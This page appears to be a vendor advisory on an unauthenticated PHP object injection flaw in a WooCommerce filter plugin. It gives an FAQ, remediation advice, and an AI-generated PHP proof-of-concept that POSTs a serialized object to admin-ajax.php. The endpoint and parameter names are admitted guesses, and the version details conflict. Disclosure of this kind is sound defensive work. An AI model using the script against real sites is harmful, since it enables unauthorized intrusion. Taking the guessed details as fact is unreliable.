What is CVE-2026-40725?

CVE-2026-40725 is a high-severity vulnerability found in the WooCommerce Product Filters plugin for WordPress, affecting versions up to 2.0.6. It allows unauthenticated attackers to exploit PHP Object Injection through deserialization of untrusted input.

How does the vulnerability work?

The vulnerability arises from the plugin’s deserialization of user-supplied input without proper validation. An attacker can send a malicious serialized PHP object to an exposed endpoint, leading to potential remote code execution if a suitable gadget chain exists in other plugins or themes.

Who is affected by this vulnerability?

Any WordPress site using the WooCommerce Product Filters plugin version 2.0.6 or earlier is at risk. Administrators should check their plugin version and update if necessary to mitigate the vulnerability.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the installed version of the WooCommerce Product Filters plugin. If it is version 2.0.6 or earlier, your site is susceptible to CVE-2026-40725.

What should I do to fix this vulnerability?

The recommended fix is to update the WooCommerce Product Filters plugin to version 2.0.7 or later, which addresses the vulnerability by replacing unsafe deserialization methods. Additionally, ensure that all plugins and themes are regularly updated.

What does the CVSS score of 8.1 indicate?

A CVSS score of 8.1 indicates a high severity level, meaning that the vulnerability poses a significant risk to affected systems. It suggests that successful exploitation can lead to severe consequences, including remote code execution.

What is a PHP Object Injection (POI)?

PHP Object Injection occurs when an application deserializes untrusted data, allowing an attacker to manipulate object properties and methods. This can lead to unauthorized actions, including data manipulation and remote code execution.

What is a POP chain and why is it important?

A POP chain, or Property-Oriented Programming chain, is a sequence of object manipulations that an attacker can exploit to achieve arbitrary code execution. Although no POP chain exists within the vulnerable plugin itself, the presence of one in other plugins or themes can make exploitation possible.

How does the proof of concept demonstrate the vulnerability?

The proof of concept code illustrates how an attacker can exploit the vulnerability by sending a crafted serialized payload to an AJAX endpoint. It highlights the lack of nonce or capability checks, allowing unauthenticated access to the vulnerable functionality.

What are the potential impacts of exploitation?

If exploited, this vulnerability can lead to complete compromise of the WordPress site, allowing attackers to execute arbitrary code, delete files, or access sensitive data. The risk is amplified if other vulnerable plugins are present.

What additional security measures can I take?

In addition to updating the vulnerable plugin, consider implementing security best practices such as using a web application firewall, regularly scanning for vulnerabilities, and conducting security audits of all installed plugins and themes.

Where can I find more information about CVE-2026-40725?

More information about CVE-2026-40725 can be found on the National Vulnerability Database, security advisories from WordPress, and the Atomic Edge analysis. These resources provide detailed insights into the vulnerability and its implications.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 26, 2026

CVE-2026-40725: WooCommerce Product Filters < 2.0.6 – Unauthenticated PHP Object Injection (woocommerce-product-filters)

CVE ID CVE-2026-40725

Plugin woocommerce-product-filters

Severity High (CVSS 8.1)

CWE 502

Vulnerable Version 2.0.6

Patched Version —

Disclosed April 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-40725 (metadata-based):

The WooCommerce Product Filters plugin for WordPress, versions up to and including 2.0.6, contains an unauthenticated PHP Object Injection vulnerability. This affects the ‘woocommerce-product-filters’ plugin. The vulnerability carries a CVSS score of 8.1 (HIGH), with a vector string of AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H. The CWE classification is 502, indicating Deserialization of Untrusted Data.

Root Cause: The vulnerability stems from the plugin deserializing user-supplied input without proper sanitization or validation. Inferred from the CWE classification and description, the plugin likely passes an unserialize() call on data received from HTTP requests (possibly via a shortcode attribute, AJAX parameter, or REST API endpoint). Without access to the source code, Atomic Edge research cannot confirm the exact input vector, but the most common WordPress pattern for this vulnerability involves processing serialized data from query string parameters or POST bodies. The vulnerability requires no authentication, as the description states unauthenticated attackers can exploit it.

Exploitation: An attacker can craft a malicious serialized PHP object and send it to an exposed endpoint. Based on the plugin slug and common WordPress patterns, the likely attack vector is an AJAX handler registered via wp_ajax_ or wp_ajax_nopriv_ hooks. The endpoint is probably /wp-admin/admin-ajax.php with an action parameter like ‘woocommerce_product_filters_load’ or similar. The attacker sends a POST request containing a serialized payload in a parameter (e.g., ‘filter_data’ or ‘query_data’). The plugin then deserializes this input without validation, creating a PHP object of the attacker’s choosing. Since no POP chain exists in the plugin itself, the attack requires another plugin or theme on the target system that provides useful gadget chains for achieving remote code execution, file deletion, or data exfiltration.

Remediation: Atomic Edge analysis concludes the fix must replace all unserialize() calls with json_decode() or implement strict input validation. The plugin should never deserialize untrusted data. If serialized data is required for internal use, the plugin must use a safe serialization format like JSON and validate that the data matches expected schemas. The patched version 2.0.7 (as indicated by the vulnerable version being 2.0.6) should implement these changes.

Impact: Successful exploitation can lead to complete compromise of the WordPress site. An attacker with a suitable POP chain can achieve remote code execution, delete arbitrary files, or retrieve sensitive data such as database credentials. Despite the high complexity (AC:H in CVSS), the unauthenticated nature and severe impact make this a critical risk for any site running vulnerable versions with additional plugins that contain exploitable gadget chains.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-40725 - WooCommerce Product Filters < 2.0.6 - Unauthenticated PHP Object Injection

/**
 * This PoC demonstrates an unauthenticated PHP Object Injection attack
 * against the WooCommerce Product Filters plugin (versions <= 2.0.6).
 * 
 * Assumptions:
 * - The vulnerable endpoint is admin-ajax.php with action 'wcpf_load_products'
 *   (based on plugin slug 'woocommerce-product-filters' and common naming patterns)
 * - The parameter 'query_data' contains the serialized payload
 * - No nonce or capability checks are performed on the AJAX handler
 *
 * This payload exploits a generic PHP object injection. Replace 'SomeClass' with
 * an actual class name from a POP chain present on the target system.
 */

$target_url = 'http://example.com'; // Change this to the target WordPress URL

// The serialized object payload - this example creates a stdClass object
// In a real attack, this would contain a gadget chain to execute arbitrary code
$payload = serialize(new stdClass());

// Alternative payload with a specific class (requires POP chain)
// $payload = 'O:9:"SomeClass":1:{s:4:"prop";s:4:"test";}';

// Initialize cURL
$ch = curl_init();

// Prepare POST data for the AJAX request
$post_data = array(
    'action'     => 'wcpf_load_products',
    'query_data' => $payload
);

// Configure cURL request
curl_setopt_array($ch, array(
    CURLOPT_URL            => $target_url . '/wp-admin/admin-ajax.php',
    CURLOPT_POST           => true,
    CURLOPT_POSTFIELDS     => http_build_query($post_data),
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_HEADER         => false,
    CURLOPT_SSL_VERIFYPEER => false, // Disable for testing with self-signed certs
    CURLOPT_TIMEOUT        => 30,
    CURLOPT_USERAGENT      => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
));

// Execute the request
$response = curl_exec($ch);

// Check for errors
if (curl_errno($ch)) {
    echo '[!] cURL Error: ' . curl_error($ch) . PHP_EOL;
} else {
    echo '[+] Request sent successfully.' . PHP_EOL;
    echo '[!] Response: ' . $response . PHP_EOL;
    echo '[!] If the server returns a JSON error or empty response, the injection may have succeeded or the endpoint is incorrect.' . PHP_EOL;
}

// Close cURL handle
curl_close($ch);

/**
 * Notes:
 * - Adjust the 'action' parameter if the actual endpoint differs (check plugin source or network traffic)
 * - If no POP chain exists, the object is created but has no effect (PHP garbage collected)
 * - For testing, use XDebug or log injection to confirm the unserialize() call
 */

Frequently Asked Questions

What is CVE-2026-40725?
Overview of the vulnerability
CVE-2026-40725 is a high-severity vulnerability found in the WooCommerce Product Filters plugin for WordPress, affecting versions up to 2.0.6. It allows unauthenticated attackers to exploit PHP Object Injection through deserialization of untrusted input.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the plugin’s deserialization of user-supplied input without proper validation. An attacker can send a malicious serialized PHP object to an exposed endpoint, leading to potential remote code execution if a suitable gadget chain exists in other plugins or themes.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the WooCommerce Product Filters plugin version 2.0.6 or earlier is at risk. Administrators should check their plugin version and update if necessary to mitigate the vulnerability.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the installed version of the WooCommerce Product Filters plugin. If it is version 2.0.6 or earlier, your site is susceptible to CVE-2026-40725.
What should I do to fix this vulnerability?
Recommended remediation steps
The recommended fix is to update the WooCommerce Product Filters plugin to version 2.0.7 or later, which addresses the vulnerability by replacing unsafe deserialization methods. Additionally, ensure that all plugins and themes are regularly updated.
What does the CVSS score of 8.1 indicate?
Understanding the severity rating
A CVSS score of 8.1 indicates a high severity level, meaning that the vulnerability poses a significant risk to affected systems. It suggests that successful exploitation can lead to severe consequences, including remote code execution.
What is a PHP Object Injection (POI)?
Definition and implications
PHP Object Injection occurs when an application deserializes untrusted data, allowing an attacker to manipulate object properties and methods. This can lead to unauthorized actions, including data manipulation and remote code execution.
What is a POP chain and why is it important?
Role of gadget chains in exploitation
A POP chain, or Property-Oriented Programming chain, is a sequence of object manipulations that an attacker can exploit to achieve arbitrary code execution. Although no POP chain exists within the vulnerable plugin itself, the presence of one in other plugins or themes can make exploitation possible.
How does the proof of concept demonstrate the vulnerability?
Understanding the PoC code
The proof of concept code illustrates how an attacker can exploit the vulnerability by sending a crafted serialized payload to an AJAX endpoint. It highlights the lack of nonce or capability checks, allowing unauthenticated access to the vulnerable functionality.
What are the potential impacts of exploitation?
Consequences of a successful attack
If exploited, this vulnerability can lead to complete compromise of the WordPress site, allowing attackers to execute arbitrary code, delete files, or access sensitive data. The risk is amplified if other vulnerable plugins are present.
What additional security measures can I take?
Enhancing site security
In addition to updating the vulnerable plugin, consider implementing security best practices such as using a web application firewall, regularly scanning for vulnerabilities, and conducting security audits of all installed plugins and themes.
Where can I find more information about CVE-2026-40725?
Resources for further reading
More information about CVE-2026-40725 can be found on the National Vulnerability Database, security advisories from WordPress, and the Atomic Edge analysis. These resources provide detailed insights into the vulnerability and its implications.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations